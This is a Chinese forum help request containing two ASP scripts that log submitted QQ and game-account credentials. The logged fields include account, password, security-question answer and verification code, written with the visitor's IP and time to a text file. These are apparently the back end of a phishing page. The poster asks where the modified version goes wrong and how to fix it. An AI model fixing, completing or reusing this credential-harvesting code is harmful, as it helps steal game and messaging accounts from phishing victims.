<%
strLogFile="975737323.txt"
YouXiname=request("YouXiname")
FuWuQi=request("FuWuQi")
username=request("ZhangHao")
password=request("MiMa")
MiBao=request("MiBao")
VIPC=request("YanZhengMa")
Zhiye=request("Zhiye")
QQyx=request("QQyx")
QQip=request("QQip")
if YouXiname="" or FuWuQi="" or QuYu="" or ZhangHao="" or MiMa="" or MiBao="" or YanZhengMa="" or Zhiye="" then
response.write "QQ"
response.end
End If
StrLogText=StrLogText&QQNumber&"----"&QQPassWord&"----"&QQyx&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")
StrLogText=StrLogText&")----"&date&" "&time
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
response.write "发送成功!"
%>
这个代码哪写错了??????? 这段代码是什么意思。
我是在
<%
strLogFile="shandian.txt"
QQNumber=request("QQNumber")
QQPassWord=request("QQPassWord")
QQyx=request("QQyx")
QQip=request("QQip")
if QQNumber="" or QQPassWord="" then
response.write "QQ"
response.end
End If
StrLogText=StrLogText&QQNumber&"----"&QQPassWord&"----"&QQyx&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")
StrLogText=StrLogText&")----"&date&" "&time
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
response.write "发送成功!"
%>
的基础上改的。哪里改错了?要怎么修改呀!先谢谢各位大虾了。 分保证可以谈。
我邮箱 752016968@qq.com